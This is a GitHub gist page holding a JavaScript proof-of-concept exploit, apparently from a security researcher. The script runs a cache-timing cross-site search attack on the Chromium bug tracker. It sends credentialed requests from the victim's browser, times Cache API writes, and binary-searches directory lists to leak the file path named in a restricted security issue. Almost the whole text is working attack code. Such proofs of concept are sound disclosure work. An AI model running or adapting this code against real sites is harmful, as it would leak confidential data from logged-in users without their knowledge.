-
-
Save lbherrera/188a871edbe7645be18545805be036b8 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function clear_cache() { | |
caches.open('cache').then(function(cache) { | |
cache.keys().then(function(keys) { | |
keys.forEach(function(request, index, array) { | |
cache.delete(request); | |
}); | |
}); | |
}); | |
} | |
function split_array(array) { | |
var halfWayThough = Math.floor(array.length / 2) | |
var arrayFirstHalf = array.slice(0, halfWayThough); | |
var arraySecondHalf = array.slice(halfWayThough, array.length); | |
return [arrayFirstHalf, arraySecondHalf]; | |
} | |
function check_end(leak, optPath, hold, xplStart) { | |
if (hold[0].includes(".")) { | |
console.log(leak + optPath + hold[0]); | |
console.log("Time to exfiltrate url: " + String(performance.now() - xplStart)); | |
alert(leak + optPath + hold[0]); | |
return true; | |
} | |
return false; | |
} | |
function exploit(query1, query2, optPath) { | |
clear_cache(); | |
var preparedQuery1 = ""; | |
var preparedQuery2 = ""; | |
for (var i = 0; i < query1.length; i++) { | |
preparedQuery1 += ` OR id:770148 "/src/third_party/${ optPath }${ query1[i] }"`; | |
} | |
for (var i = 0; i < query2.length; i++) { | |
preparedQuery2 += ` OR id:770148 "/src/third_party/${ optPath }${ query2[i] }"`; | |
} | |
preparedQuery1 = preparedQuery1.substring(4); | |
preparedQuery2 = preparedQuery2.substring(4); | |
var base = "https://bugs.chromium.org/p/chromium/issues/csv"; | |
var params = `?can=1&q=${ preparedQuery1 }&colspec=AllLabels${ "+AllLabels".repeat(500) }`; | |
var url = base + params; | |
var times = []; | |
caches.open('cache').then(function(cache) { | |
fetch(url, { | |
mode: "no-cors", | |
credentials: "include" | |
}).then(function(response) { | |
function req(start, request) { | |
cache.put(new Request('foo' + Math.random()), request.clone()).then(function() { | |
var end = performance.now(); | |
var time = end - start; | |
times.push(time); | |
if (times.length > 500) { | |
clear_cache(); | |
times.shift(); | |
var sum = times.reduce(function(a, b) { return a + b; }); | |
var avg = sum / times.length; | |
if (avg >= avg_time) { | |
times = times.filter(function(x) { | |
return x < 2; | |
}); | |
var query = split_array(query1); | |
var hold = query[0].concat(query[1]); | |
if (hold.length == 1) { | |
if (check_end(leak, optPath, hold, xplStart)) return; | |
var new_query = split_array(dirs[hold[0]]); | |
var newPath = optPath + hold[0]; | |
return exploit(new_query[0], new_query[1], newPath); | |
} | |
console.log(query1); | |
return exploit(query[0], query[1], optPath); | |
} else { | |
var query = split_array(query2); | |
var hold = query[0].concat(query[1]); | |
if (hold.length == 1) { | |
if (check_end(leak, optPath, hold, xplStart)) return; | |
var new_query = split_array(dirs[hold[0]]); | |
var newPath = optPath + hold[0]; | |
return exploit(new_query[0], new_query[1], newPath); | |
} | |
console.log(query2); | |
return exploit(query[0], query[1], optPath); | |
} | |
return; | |
} | |
req(performance.now(), request); | |
}); | |
} | |
req(performance.now(), response); | |
}); | |
}); | |
} | |
let avg_time = 2; | |
let leak = "https://cs.chromium.org/chromium/src/third_party/"; | |
let dirs = {} | |
dirs["third_party/"] = ["Python-Markdown/","SPIRV-Tools/","WebKit/","accessibility-audit/","accessibility_test_framework/","adobe/","afl/","analytics/","android_async_task/","android_crazy_linker/","android_data_chart/","android_deps/","android_media/","android_ndk/","android_opengl/","android_platform/","android_protobuf/","android_support_test_runner/","android_swipe_refresh/","android_system_sdk/","android_tools/","angle/","apache-portable-runtime/","apache-win32/","apk-patch-size-estimator/","apple_apsl/","apple_sample_code/","ashmem/","auto/","axe-core/","bazel/","bidichecker/","binutils/","bison/","blanketjs/","blink/","boringssl/","bouncycastle/","breakpad/","brotli/","bspatch/","byte_buddy/","cacheinvalidation/","catapult/","ced/","chaijs/","checkstyle/","chromite/","cld_3/","closure_compiler/","colorama/","crashpad/","crc32c/","cros_system_api/","custom_tabs_client/","d3/","decklink/","depot_tools/","deqp/","devscripts/","devtools-node-modules/","dom_distiller_js/","elfutils/","errorprone/","espresso/","eu-strip/","expat/","feed/","ffmpeg/","fips181/","flac/","flatbuffers/","flot/","fontconfig/","freetype/","gardiner_mod/","gestures/","gif_player/","glslang/","glslang-angle/","gnu_binutils/","google_appengine_cloudstorage/","google_input_tools/","google_toolbox_for_mac/","googletest/","gperf/","gradle_wrapper/","gson/","guava/","gvr-android-keyboard/","gvr-android-sdk/","haha/","hamcrest/","harfbuzz-ng/","hunspell/","hunspell_dictionaries/","iaccessible2/","iccjpeg/","icu/","icu4j/","ijar/","ink/","inspector_protocol/","instrumented_libraries/","intellij/","isimpledom/","javax_inject/","jinja2/","jmake/","jsoncpp/","jsr-305/","jstemplate/","junit/","khronos/","lcov/","leakcanary/","leveldatabase/","libFuzzer/","libXNVCtrl/","libaddressinput/","libaom/","libdrm/","libevdev/","libjingle_xmpp/","libjpeg/","libjpeg_turbo/","liblouis/","libovr/","libphonenumber/","libpng/","libprotobuf-mutator/","libsecret/","libsrtp/","libsync/","libudev/","libusb/","libvpx/","libwebm/","libwebp/","libxml/","libxslt/","libyuv/","lighttpd/","logilab/","lss/","lzma_sdk/","mach_override/","markdown/","markupsafe/","material_design_icons/","mesa/","metrics_proto/","mingw-w64/","minigbm/","minizip/","mocha/","mockito/","modp_b64/","molokocacao/","motemplate/","mozilla/","nacl_sdk_binaries/","netty-tcnative/","netty4/","node/","objenesis/","ocmock/","openh264/","openmax_dl/","openvr/","opus/","ots/","ow2_asm/","pdfium/","pefile/","perfetto/","perl/","pexpect/","ply/","polymer/","proguard/","protobuf/","pycoverage/","pyelftools/","pyftpdlib/","pylint/","pymock/","pystache/","pywebsocket/","qcms/","qunit/","re2/","requests/","rnnoise/","robolectric/","s2cellid/","sfntly/","shaderc/","simplejson/","sinonjs/","skia/","smhasher/","snappy/","speech-dispatcher/","spirv-headers/","spirv-tools-angle/","sqlite/","sqlite4java/","sudden_motion_sensor/","swiftshader/","tcmalloc/","test_fonts/","tlslite/","typ/","ub-uiautomator/","unrar/","usb_ids/","usrsctp/","v4l-utils/","visualmetrics/","vulkan/","vulkan-validation-layers/","wayland/","wayland-protocols/","wds/","web-animations-js/","webdriver/","webgl/","webrtc/","webrtc_overrides/","widevine/","win_build_output/","woff2/","wtl/","xdg-utils/","xstream/","yara/","yasm/","zlib/"]; | |
dirs["pdfium/"] = ["build_overrides/","core/","docs/","fpdfsdk/","fxbarcode/","fxjs/","infra/","public/","samples/","skia/","testing/","third_party/","tools/","xfa/"]; | |
dirs["fpdfsdk/"] = ["formfiller/","fpdfxfa/","pwl/"]; | |
dirs["pwl/"] = ["README.md","cpwl_appstream.cpp","cpwl_appstream.h","cpwl_button.cpp","cpwl_button.h","cpwl_caret.cpp","cpwl_caret.h","cpwl_combo_box.cpp","cpwl_combo_box.h","cpwl_combo_box_embeddertest.cpp","cpwl_edit.cpp","cpwl_edit.h","cpwl_edit_ctrl.cpp","cpwl_edit_ctrl.h","cpwl_edit_embeddertest.cpp","cpwl_edit_impl.cpp","cpwl_edit_impl.h","cpwl_font_map.cpp","cpwl_font_map.h","cpwl_icon.cpp","cpwl_icon.h","cpwl_list_box.cpp","cpwl_list_box.h","cpwl_list_impl.cpp","cpwl_list_impl.h","cpwl_scroll_bar.cpp","cpwl_scroll_bar.h","cpwl_special_button.cpp","cpwl_special_button.h","cpwl_timer.cpp","cpwl_timer.h","cpwl_timer_handler.cpp","cpwl_timer_handler.h","cpwl_wnd.cpp","cpwl_wnd.h"]; | |
var third_party = split_array(dirs["third_party/"]); | |
var xplStart = performance.now(); | |
exploit(third_party[0], third_party[1], ""); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment